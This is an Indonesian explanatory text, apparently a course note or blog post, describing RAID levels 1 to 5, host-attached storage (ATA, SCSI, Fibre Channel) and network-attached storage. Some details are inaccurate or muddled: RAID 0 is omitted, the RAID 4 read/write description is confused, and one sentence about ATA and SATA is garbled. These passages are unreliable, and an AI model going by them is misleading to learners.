Pada awal perkembangannya, bahan yang digunakan sebagai media penyimpan adalah iron oxide. Tetapi sekarang banyak digunakan media thin film. Media ini merupakan media yang lebih banyak menyimpan data dari pada iron oxide pada luasan yang sama dan juga sifatnya yang lebih awet.

TEKNOLOGI RAID
RAID singkatan dari Redundant Array of Independent Disks. Teknologi ini membagi atau mereplikasi data ke dalam beberapa hard disk terpisah. Meski terdiri dari beberapa HD, sistem operasi akan membacanya sebagai satu disk. RAID didesain untuk meningkatkan keandalan data dan/atau meningkatkan kinerja I/O dari hard disk. Saat menyimpan sebuah data, data yang sama akan disimpan dalam hard disk lain, sehingga tingkat kegagalan penyimpanan data akibat kerusakan disk akan berkurang. Sebaliknya, data dalam setiap hard disk juga akan dibaca pada waktu bersamaan. Dengan begitu, akses data akan lebih cepat karena jika satu hard disk gagal terbaca, maka data yang sama pada hard disk lain akan menggantikannya.


LEVEL PADA RAID
Ada 5 level pada RAID, mulai dari RAID 1 hingga RAID 5. Penomoran ini semata-mata hanyalah menunjukkan perbedaan metoda yang dipakai untuk memproteksi data harddisk dan tidak ada hubunggannya dengan tingkat kecepatan maupun kualitas. Tiap level RAID didesain khusus untuk aplikasi khusus. Pemilihan RAID yang tepat untuk server ditentukan berdasarkan cara memakai jaringan.

RAID level 1
RAID 1 identik dengan total redundansi dimana 2 harddisk yang masing-masing samakapasitasnya menyalin isi (mirorring) data disk satu sama lainnya. Yang satu secara otomatis dan secara terus menerus melakukan back-up terhadap yang lainnya. Operasi dialihkan ke salah satu dari drive tunggal yang normal bila yang lainnya rusak.
RAID 1 didesain untuk menangani data yang teramat penting (bernilai amat mahal/sulit diganti bila hilang). Konsep kerja ini menyebabkan kapasitas total harddisk akan berkurang setengahnya walau tidak mempengaruhi performance keseluruhan. Kontroller RAID 1 yang lebih canggih biasanya mampu mengirimkan data sebanyak 2 kali lipat dengan cara membaca sektor-sektor yang bersangkutan dari 2 drive secara serentak.

RAID level 2
Cara kerjanya adalah dengan memisahkan masing-masing bit dari byte/blok data pada drive yang terpisah dan menambahkannya pada beberapa drive lainnya untuk pemeriksaan kesalahan.
RAID level 2 tidak cocok digunakan untuk menyimpan file data dengan ukuran yang kecil. Keuntungan penggunaan RAID Level 2 adalah kecepatan transfer data yang tinggi. Hal ini didapat karena drive mengirimkan data secara paralel. Setiap kesalahan yang terjadi akan dikoreksi tanpa menimbulkan waktu tunda sedikitpun karena kontrolernya dapat memanfaatan informasi yang ada tanpa perlu membaca ulang drive lagi.

RAID level 3
RAID level 3 memanfaat prinsip pendeteksian kesalahan bukan mengkoreksi kesalahan. Pendeteksian kesalahan dilakukan dengan pemrosesan pemeriksaan paritas. Saat error terdeteksi oleh kontroler maka RAID akan membaca ulang data pada drive untuk menyelesaikan masalah error tersebut. Artinya seluruh piringan disk pada RAID akan berputar lebih banyak dari biasanya. RAID 3 biasanya digunakan pada Superkomputer.


RAID level 4
RAID level 4 bekerja pada level sektor bukannya level bit. Sebuah file pada RAID 4 akan dipecah menjadi beberapa sektor dimana setiap sektorna akan disebarkan pada semua drive. Lalu nantinya sektor itu akan dibaca secara serial. Pertama dari drive ke 1,lalu ke 3 , dst.
Untuk pendeteksian kesalahan RAID 4 menambahkan sebuah drive paritas dan kontroler RAID 4 dapat memperbaiki performancenya dengan teknik data striping. Dua atau lebih sektor dari drive yang berlainan dapat dibaca secara serentak lalu disimpan pada RAM berkecepatan tinggi dan secara berurutan akan dikirimkan ke user dengan kecepatan tinggi.
Operasi penulisan lebih lamban dari operasi pembacaan. Hal ini dikarenakan RAID 4 memakai teknologi baca setelah tulis. Artinya setelah data dituliskan ke disk lalu dilakukan pembacaan untuk menentukan paritas kemudian data paritas tersebut dituliskan ke drive parity.


RAID level 5
RAID 5 melenyapkan drive parity yang ada pada RAID 4. Informasi pemeriksaan paritas ditambahkan sebagai sektor biasa yang menjelajahi seluruh disk pada RAID persis sepeti halnya data biasa lainnya. Keuntungannya adalah kontroler RAID 5 mampu menyediakan kempuan data striping dan elevator seeking.


TEKNOLOGI HAS(Host attached storage)
 Host-Attached Storage (HAS) adalah pengaksesan storage melalui port M/K lokal. Port-port ini menggunakan beberapa teknologi. PC biasanya menggunakan sebuah arsitektur bus M/K yang bernama IDE atau ATA. Arsitektur ini men-support maksimal 2 drivesimplified cabling adalah SATA. High-end workstation dan server biasanya menggunakan arsitektur M/K yang lebih rumit, seperti SCSI atau fiber channel (FC).

SCSI adalah sebuah arsitektur bus. Medium fisiknya biasanya adalah kabel ribbon yang memiliki jumlah konduktor yang banyak (biasanya 50 atau 68). Protokol SCSI men-support maksimal 16 device dalam bus. Biasanya, device tersebut termasuk sebuah controller card dalam host (SCSI initiator, yang meminta operasi) dan sampai 15 storage device (SCSI target, yang menjalankan perintah). Sebuah SCSI disk adalah sebuah SCSI target yang biasa, tapi protokolnya menyediakan kemampuan untuk menuliskan sampai 8 logical unit pada setiap SCSI target. Penggunaan logical unit addressing biasanya adalah perintah langsung pada komponen dari array RAID atau komponen dari removable media library.

FC adalah sebuah arsitektur seri berkecepatan tinggi yang dapat beroperasi pada serat optik atau pada kabel copper 4-konduktor. FC mempunyai dua varian. Yang pertama adalah sebuah switched fabric besar yang mempunyai 24-bit space alamat. Varian ini diharapkan dapat mendominasi di masa depan dan merupakan dasar dari storage-area network (SAN). Karena besarnya space alamat dan sifat switched dari komunikasi, banyak host dan device penyimpanan dapat di-attach pada fabric, memungkinkan fleksibilitas yang tinggi dalam komunikasi M/K. Varian FC lain adalah abritrated loop (FC-AL) yang bisa menuliskan 126 device (drive dan controller).

Banyak variasi dari device penyimpanan yang cocok untuk digunakan sebagai HAS. Beberapa diantaranya adalah hard disk, RAID array, serta drive CD, DVD dan tape. Perintah M/K yang menginisiasikan transfer data ke HAS device adalah membaca dan menulis logical data block yang diarahkan ke unit penyimpanan teridentifikasi yang spesifik (seperti bus ID, SCSI ID, dan target logical unit).


TEKNOLOGI NAS(Network Attached Storage)
Network-Attached Storage (NAS) adalah storage hard disk yg dikonfigurasi dengan memberikannya IP Address dan dipasang di jaringan LAN (bukan dengan cara memasang langsung di komputer yg menjalankan aplikasi), sehingga dapat diakses oleh beberapa user sekaligus. Dengan cara memindahkan akses ke storage beserta manajemennya dari server seperti ini, maka program aplikasi dan file dapat diakses lebih cepat, tidak menggunakan resource prosesor yg sama lagi. NAS ini terdiri dari hard disk storage (umumnya juga termasuk sistem RAID multi disc) beserta software utk mengkonfigurasinya. Dari sisi instalasi, perbedaan NAS dengan DAS adalah sejak awal pengguna NAS sudah harus menentukan berapa besar hard disk yg akan dialokasikan utk keperluan tertentu.
NAS sistem jaringan peralatan yang mengandung satu atau lebih hard drive, sering disusun menjadi logis, wadah penyimpanan berlebihan atau array RAID. Network-attached storage menghapus tanggung jawab melayani file dari server lain pada jaringan. Mereka biasanya menyediakan akses ke file menggunakan protokol jaringan file sharing seperti NFS, SMB / CIFS, atau AFP.